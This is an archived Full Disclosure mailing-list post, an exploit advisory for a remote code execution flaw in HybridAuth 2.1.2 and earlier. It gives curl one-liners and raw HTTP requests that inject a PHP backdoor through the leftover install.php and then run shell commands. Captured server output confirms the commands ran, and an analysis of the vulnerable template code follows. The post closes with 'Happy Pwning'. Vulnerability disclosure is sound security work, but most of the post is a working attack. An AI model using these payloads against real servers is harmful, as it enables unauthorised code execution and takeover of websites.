lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CACfHS=UQKoxROwcfaCBeTiDyZiKPxRyrnOxAY-RCejZcw-biMw@mail.gmail.com>
Date: Tue, 5 Aug 2014 02:15:46 +0700
From: Pichaya Morimoto <pichaya@...e.org>
To: submit@...sec.com, fulldisclosure@...lists.org
Subject: [FD] HybridAuth <= 2.1.2 Remote Code Execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512


######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# HybridAuth <= 2.1.2 Remote Code Execution
# Website : http://hybridauth.sourceforge.net/
# Exploit Author : @u0x (Pichaya Morimoto)
# Release dates : August 5, 2014
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================
HybridAuth enable developers to easily build social applications to engage
websites
vistors and customers on a social level by implementing social signin,
social sharing,
users profiles, friends list, activities stream, status updates and more.


[+] Exploit
============================================================
The default installation leave "install.php" untouched.
$ curl http://victim/hybridauth/install.php -d
'GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*'
$ curl http://victim/hybridauth/config.php -d '0=id;ls -lha'


[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

Download :
http://sourceforge.net/projects/hybridauth/files/hybridauth-2.1.2.zip/download

1. Inject Evil PHP Backdoor
POST /hybridauth/install.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*

HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 2437
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<title>HybridAuth Installer</title>
...

2. Gaining access to the PHP backdoor
POST /hybridauth/config.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

0=id;ls%20-lha

HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:54:56 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 40K
drwxrwxr-x 3 longcat  longcat  4.0K Feb 15  2013 .
drwxr-xr-x 4 longcat  www-data 4.0K Aug  5 01:14 ..
drwxrwxr-x 5 longcat  longcat  4.0K Feb 15  2013 Hybrid
- -rw-rw-r-- 1 www-data www-data 2.5K Aug  5 01:53 config.php
- -rw-rw-r-- 1 longcat  longcat   488 Feb 15  2013 index.php
- -rw-rw-r-- 1 longcat  longcat   18K Feb 16  2013 install.php


[+] Vulnerability Analysis
============================================================

Filename: ./install.php
...
if( count( $_POST ) ): <-- user controlled input HTTP POST data
    \/-- Read a template file
    $CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.tpl"
);

    foreach( $_POST AS $k => $v ):
        $v = strip_tags( $v );
        $z = "#$k#";

        \/-- #POST data's keys# found in template file will be replaced
with POST data's values
            | so we can simply replace these existing values with something
fun :)
        $CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );
    endforeach;
    ...
    \/-- upload that replaced template contents into config.php
    $is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE .
"config.php",  $CONFIG_TEMPLATE );
...

Filename: ./Hybrid/resources/config.php.tpl
...
return
    array(
        "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#", <-- #..# will be
replaced with arbitrary PHP code
...

So this is what injected "config.php" looks like...
Filename: ./config.php
<?php
...
return
    array(
        "base_url" => "".system($_POST[0]));/*",

        "providers" => array (
            // openid providers
            "OpenID" => array (
                "enabled" => #OPENID_ADAPTER_STATUS#
            ),
...


Happy Pwning ;)
LongCat
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJT39trAAoJEB2kHapd1XMUvFcP/je2VBLG4wDR1W2HIYCVmFOw
7WCYw+bWwDlf3rJsOJd/gQXIGIdgfGXP5nKE6nbvQ6N5a3ucHgArcjonP4kcMzTi
wNgx01wdz0YkuZOoWqMz76VWjhNt+jfLm2rG2ihro8P1wvAX8/UOlOhmWXA0loeV
pqoFeXvA5cC3lKQ8qnZiTlNepIDvoCbfo7EDpFWv+lCh23GoZsawdZ4MOg/l/D/Y
qfCCGtcyaYC2qQAHTqaim0zLF6jUEto0+Y3+3Lxi3G9JdCYGWGWrX83L5ziVIEJI
ANvaJEZF+JMzzS/RHufSMngld9IXGvDv/ZVMgn0ONH3bk2o9I19Nb/HT2DKnRSCh
1pIXWdQwnDuAM8z7ZhDakTusWlR2RiPM6YuPLUnyJHlx4PH2BnLlwVKZlNbcl97A
9qnbrUTmlivJx+Bh6HjU6TS5AN3ETVEngEG/vEkCmbEWvJyMpXppSq6a/gejDNx7
N57fqw+Vz/cWQVk7BaHK9KYQ3SnEJwdDFkCctlv13Ckd2UuOfAi1qwfZ7n6S0JgD
oVO64SpYkeodOSJ59YX9vNn/gSYLjayNKINHWhJvtVXanYHrJzZY9Orjzf5pAl3+
WOGYjuf4pPJY2XNjAE4AQ68g2Csl3cqLdbHe1yRVrPmzK1ZMQC/tjcgiB6XZObxe
kAPY+EmH3MxZ/qeob16k
=10bM
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ